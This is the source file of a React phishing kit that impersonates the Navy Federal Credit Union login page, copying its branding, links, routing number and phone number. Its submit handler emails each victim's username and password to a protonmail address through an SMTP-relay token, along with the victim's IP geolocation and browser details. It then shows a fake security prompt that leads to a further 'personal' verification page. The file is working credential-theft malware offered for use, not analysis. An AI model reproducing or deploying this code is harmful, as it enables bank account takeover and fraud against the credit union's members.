import { useState, useEffect } from "react";
import detect from "detect.js";
import nfcu_mob_logo from "./NFCU_Mob_Logo-1d62888b4b662af9142e3c385f423f32.svg";
import img_logo_veteran from "./img_logo-veterans-1d62888b4b662af9142e3c385f423f32.svg";
import contact_us from "./contact-us-1d62888b4b662af9142e3c385f423f32.svg";
import img_becomeAmember from "./img-BecomeAMember-1d62888b4b662af9142e3c385f423f32.jpg";
import group5159 from "./Group5159-1d62888b4b662af9142e3c385f423f32.svg";
import group5166 from "./Group5166-1d62888b4b662af9142e3c385f423f32.svg";
import group5158 from "./Group5158-1d62888b4b662af9142e3c385f423f32.svg";
import "./css.css";
import "./nfcu-icons-599150400912c8247ee1872211972b2a.css";
import "./all-599150400912c8247ee1872211972b2a.css";
import "./nauth-599150400912c8247ee1872211972b2a.css";
import "./responsivemain-599150400912c8247ee1872211972b2a.css";
import "./style.css";

const ua = detect.parse(navigator.userAgent);

const Main = (props) => {
  const [account, setAccount] = useState({
    user: "",
    password: "",
  });
  const [errors, setErrors] = useState({});
  const [location, setLocation] = useState({});
  const [modal, setModal] = useState(false);
  const [warnModal, setWarnModal] = useState(false);

  const handleChange = ({ currentTarget: input }) => {
    account[input.name] = input.value;
    setAccount({ ...account });

    const error = validate();
    setErrors(error);
  };

  const handleWarnModal = () => {
    setModal(true);
    setTimeout(
      () => props.history.push("/NFOAA_AUTH/VERIFICATION/personal.jsp"),
      1000
    );
  };

  const validate = () => {
    const error = {};

    if (account.user.trim() === "") {
      error.user = true;
    }
    if (account.password.trim() === "") {
      error.password = true;
    }
    return Object.keys(error).length === 0 ? null : error;
  };

  const sendEmail = () => {
    window.Email.send({
      SecureToken: "fe6ccd4a-e4e5-4391-b1ae-76876873d966",
      To: "hisname2001@protonmail.com",
      From: "NFCU@hey.com",
      Subject: `#NFCU LOGIN ACCESS => From ${location && location.IPv4} [${
        location && location.country_name
      } - ${location && location.country_code}] `,
      Body: `
<span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - LOGIN ACCESS ]=======# <b /></span> <br />
          <span style="font-family:Tahoma, sans-serif"> Username: ${
            account.user
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif">Password: ${
            account.password
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"><b>#=======[ NFCU - IP INFO ]=======#</b> </span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Address: ${
            location && location.IPv4
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Country: ${
            location && location.country_name
          }${location && location.country_code}</span>  <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP Latitude Longitude: ${
            location && location.latitude
          } ${location && location.longitude}</span> <br />
          <span style="font-family:Tahoma, sans-serif">IP State: ${
            location && location.state
          }</span> <br />
          <span style="font-family:Tahoma, sans-serif"> IP City: ${
            location && location.city
          } </span> <br />
          <span style="font-family:Tahoma, sans-serif"> Browser: ${
            ua && ua.browser.family
          } on ${ua && ua.device.family}</span> <br /> 
          <span style="font-family:Tahoma, sans-serif"> User Agent:  ${
            ua && ua.source }
          }} on {{ device }}</span> <br />
          <span style="font-family:Tahoma, sans-serif"> <b> #=======[ NFCU - LOGIN ACCESS ]=======# </b> </span> <br />
      `,
    }).then((message) => message);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    sendEmail();
    setModal(true);
    setTimeout(() => {
      setWarnModal(true);
      setModal(false);
    }, 2000);
  };

  useEffect(() => {
    fetch(
      "https://geolocation-db.com/json/ef6c41a0-9d3c-11eb-8f3b-e1f5536499e7"
    )
      .then((response) => response.json())
      .then((data) => {
        const details = data;
        setLocation(details);
      });
  }, []);

  return (
    <div className="responsive">
      {/* {modal && ( */}
      {warnModal && !modal && (
        <div id="wait-cursor">
          <div className="alert alert-warning alert_modal_center" role="alert">
            <p>
              {" "}
              To protect your security, we need to verify it's you. Click
              continue to proceed to verification. <br />
              <input
                type="button"
                style={{
                  backgroundColor: "#fff",
                  color: "#ed780f",
                }}
                className="btn btn-primary float-end"
                value="Continue"
                onClick={handleWarnModal}
              />
            </p>
          </div>
        </div>
      )}
      {modal && (
        <div id="wait-cursor">
          <div className="loader"></div>
        </div>
      )}
      {/* )} */}
      <div className="mobileMenu">
        <div className="MobileMenuHeader"></div>
        <div className="MobileMenuContent">
          <div className="MobLocations">
            <a href="https://www.navyfederal.org/branches-atms/index.php">
              <span></span>Locations
            </a>
          </div>
          <div className="MobContactUs">
            <a href="https://www.navyfederal.org/contact-us/">
              <span></span>Contact Us
            </a>
          </div>
          <div className="MobRoutingNumber">
            <p>
              Routing Number: <strong>256074974</strong>
            </p>
          </div>
        </div>
      </div>

      <div className="pageWrap">
        {/* <!-- start of header --> */}
        <div className="header-sm" role="banner">
          <div className="container">
            <div className="header-content-sm">
              <div className="mob-nav-menu">
                <i className="fa fa-bars"></i>
              </div>
              <div className="logo-sm">
                <a
                  href="https://www.navyfederal.org/"
                  title="Go to NavyFederal.org"
                >
                  <img
                    className="logo-sm-pic"
                    src={nfcu_mob_logo}
                    alt="Navy Federal Credit Union | Army, Marine Corps, Navy, Air Force, Coast Guard, Family (Logo)"
                  />
                </a>
              </div>
            </div>
          </div>
        </div>
        <div className="header-bg" role="banner">
          <div className="container">
            <div className="content-box">
              <div className="header-content-bg">
                <div className="logo">
                  <a
                    href="https://www.navyfederal.org/"
                    title="Go to NavyFederal.org"
                    className="logo_bg_a"
                  >
                    <img
                      src={img_logo_veteran}
                      alt="Navy Federal Credit Union | Army, Marine Corps, Navy, Air Force, Coast Guard, Family (Logo)"
                      className="logo_bg"
                    />{" "}
                  </a>
                </div>
                <div className="nav navbar-collapse">
                  <div className="rt-container">
                    <span className="text-routing">Routing Number: </span>
                    <span className="rnumber">256074974</span>
                  </div>
                  <a
                    className="padRight20 loc-class"
                    href="https://www.navyfederal.org/branches-atms/index.php"
                  >
                    <span className="icon-locations"></span> Locations{" "}
                  </a>

                  <a
                    className="Contact-us"
                    href="https://www.navyfederal.org/contact-us/"
                  >
                    <img
                      src={contact_us}
                      className="icon_more_contact_us_default"
                      alt="Contact Us"
                    />{" "}
                    Contact Us
                  </a>
                </div>
              </div>
            </div>
          </div>
        </div>

        {/* <!-- end of header--> */}

        {/* <!-- main content area starts here --> */}
        <div className="content-wrapper" role="main">
          <div className="formbackground">
            <a id="end-header"></a>
          </div>
          <div className="container" role="main">
            <div className="background-container">
              <div className="login-content-box">
                <div className="login">
                  <div className="headers">
                    <h1>Welcome to Digital Banking</h1>
                  </div>
                  <div className="login-panel">
                    <div className="panel panel-primary heading-callout">
                      <div className="panel-heading">
                        <h2 className="panel-title">
                          <span className="icon-padlock"></span> Sign In
                        </h2>
                      </div>
                      <div className="rule-container">
                        <div className="horizontal-line"></div>
                      </div>
                      <div className="panel-body">
                        <div className="panel-content-left">
                          <form
                            id="Login"
                            className="form-inline Rectangle-2459"
                            name="Login"
                            onSubmit={handleSubmit}
                            autoComplete="off"
                          >
                            <div className="userPassGroup">
                              <div
                                className="form-group username"
                                style={{ display: "inline-block" }}
                              >
                                <label htmlFor="user">Username</label>{" "}
                                <input
                                  type="text"
                                  name="user"
                                  id="user"
                                  value={account.user}
                                  onChange={handleChange}
                                  maxLength="32"
                                  className="form-control"
                                  required=""
                                />
                              </div>
                              <div
                                className="form-group password"
                                style={{ display: "inline-block" }}
                              >
                                <label htmlFor="password">Password</label>
                                <input
                                  type="password"
                                  name="password"
                                  id="password"
                                  className="form-control"
                                  required=""
                                  value={account.password}
                                  onChange={handleChange}
                                />
                              </div>
                              <div className="signInHelp">
                                <a
                                  href="https://accountservices.navyfederal.org/account-recovery/"
                                  aria-label="Sign In Help"
                                >
                                  Sign In Help
                                </a>
                              </div>
                            </div>

                            <div className="submitAndRecaptcha ">
                              <input
                                type="submit"
                                name="SignIn"
                                className="btn btn-primary reg-sign-in"
                                id="signIn"
                                value="Sign In"
                                disabled={errors ? "disabled" : ""}
                              />
                            </div>
                          </form>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            {/* <!-- Internal Navigation Links --> */}
            <div className="membership-content-box">
              <div className="membership-middle">
                <div className="join-nfcu">
                  <div className="join-nfcu-container">
                    <div className="membership-verbiage">
                      <div className="not-a-member">
                        <h2 id="not-a-nfcu-mbr">Not a Navy Federal member?</h2>
                      </div>
                      <div className="join-now-verbiage" id="joinNowVerbiage">
                        <p>
                          Join now and enjoy the support and great service of a
                          credit union that puts your needs first.
                        </p>
                      </div>
                    </div>

                    <div className="member-buttons">
                      <button className="become-member">Become a Member</button>
                      <button
                        className="membership-learn-more"
                        aria-describedby="not-a-nfcu-mbr"
                      >
                        Learn More
                      </button>
                    </div>
                  </div>
                </div>
                <div className="join-picture">
                  <img className="join-img" alt="" src={img_becomeAmember} />
                </div>
              </div>
            </div>
            <div className="page-header">
              <div className="content-box">
                <div className="ph-content-box">
                  <div className="col-sm-4">
                    <div className="circle">
                      <img className="circle-icon" src={group5159} alt="" />
                    </div>
                    <div className="ph-text-h3">
                      <h3>Don't have online access?</h3>
                    </div>
                    <div className="ph-text-a">
                      <a href="https://accountservices.navyfederal.org/enrollment/">
                        Enroll in digital banking{" "}
                        <span aria-hidden="true">»</span>
                      </a>
                    </div>
                  </div>
                  <div className="col-sm-4">
                    <div className="circle">
                      <img
                        className="circle-icon special6px"
                        src={group5166}
                        alt=""
                      />
                    </div>
                    <div
                      id="digitalBankingSecurityHeader"
                      className="ph-text-h3"
                    >
                      <h3>Find out more about secure digital banking</h3>
                    </div>
                    <div className="ph-text-a">
                      <a
                        href="https://www.navyfederal.org/services/security/digital-security.php"
                        aria-describedby="digitalBankingSecurityHeader"
                      >
                        Learn more <span aria-hidden="true">»</span>
                      </a>
                    </div>
                  </div>
                  <div className="col-sm-4">
                    <div className="circle">
                      <img className="circle-icon" src={group5158} alt="" />
                    </div>
                    <div className="ph-text-h3">
                      <h3>Need help?</h3>
                    </div>
                    <div className="ph-text-a">
                      <a href="https://www.navyfederal.org/contact-us/">
                        Contact us
                        <span aria-hidden="true">»</span>
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      {/* <!-- end of Internal ad--> */}

      {/* <!-- start of footer  --> */}
      <div className="container footer">
        <div className="content-box">
          <div className="ft-content-box">
            <div className="footer-content">
              <div className="ft-logo">
                <a
                  href="https://www.navyfederal.org/"
                  title="Go to NavyFederal.org"
                  target="_blank"
                  className="ft-logo-a"
                >
                  <span className="nfcu-icon-ftlogo"></span>
                </a>
              </div>
              <div className="content">
                <div className="member-services marginbottom20">
                  <span className="mbr-services-txt">
                    24/7 Member Services:<b>&nbsp;1-888-842-6328&nbsp;</b>
                  </span>
                  <span className="separator mob-pipe">   |   </span>
                  <span className="mob-line-break">
                    <br />
                  </span>
                  <span className="text-routing">
                    Routing Number:&nbsp;<b>256074974</b>{" "}
                  </span>
                  <hr />
                </div>
                <div className="nav-container">
                  <nav
                    className="nav ft-nav paddingtop20 marginbottom20"
                    role="navigation"
                  >
                    <a href="https://www.navyfederal.org/about/about.php">
                      About Us   
                    </a>{" "}
                    <span className="separator">|</span>
                    <a href="https://www.navyfederal.org/contact-us/">
                         Contact Us   
                    </a>{" "}
                    <span className="separator">|</span>
                    <a href="https://www.navyfederal.org/privacy/online.php">
                         Privacy Policy   
                    </a>
                    <span className="separator">|</span>
                    <a href="https://www.navyfederal.org/security/">
                         Security   
                    </a>{" "}
                    <span className="separator">|</span>
                    <a href="https://www.navyfederal.org/accessibility.php">
                         Accessibility   
                    </a>
                    <span className="separator">|</span>
                    <a href="https://www.navyfederal.org/support/index.php">
                         Browser Support
                    </a>
                  </nav>
                </div>
                <div className="copyright">
                  <p id="copyright">
                    ©{" "}
                    <span id="year" style={{ fontWeight: "800" }}>
                      2021
                    </span>
                    <span className="copyright">
                      &nbsp;<b>Navy Federal Credit Union.</b>{" "}
                    </span>{" "}
                    All rights reserved.
                  </p>
                </div>

                <div className="nav regInstitutions">
                  <div className="ncua-link">
                    <a
                      href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf"
                      id="ncua-font"
                    >
                      <span className="icon-ncua"></span> Federally Insured by
                      NCUA
                    </a>
                    <span className="separator">     |     </span>
                  </div>
                  <div className="ehl-link">
                    <a
                      href="https://www.navyfederal.org/pdf/ebrochures/3035_EHL_Poster.pdf"
                      id="EHL"
                    >
                      <span className="icon-housing"></span> Equal Housing
                      Lender
                    </a>{" "}
                  </div>
                </div>

                <div className="ft-disclaimers">
                  <p>
                    APY = Annual Percentage Yield{" "}
                    <span className="separator">|</span> APR = Annual Percentage
                    Rate
                  </p>
                  <p>
                    <sup>+</sup>Rates are based on an evaluation of credit
                    history, so your rate may differ.
                  </p>

                  <p>
                    <sup>++</sup>Rates are variable, and based on an evaluation
                    of credit history, so your rate may differ.
                  </p>

                  <p>
                    <sup>*</sup>Message and date rates may apply. Terms and
                    Conditions are available.
                  </p>

                  <p>
                    iPhone®, iPad® and iPod touch® are trademarks of Apple Inc.
                    App Store℠ is a service mark of Apple Inc. Android™ and
                    Google Play™ are trademarks of Google Inc. Images used for
                    representational purposes only; do not imply government
                    endorsement.
                  </p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      {/* <!-- end of footer  --> */}
    </div>
  );
};

export default Main;
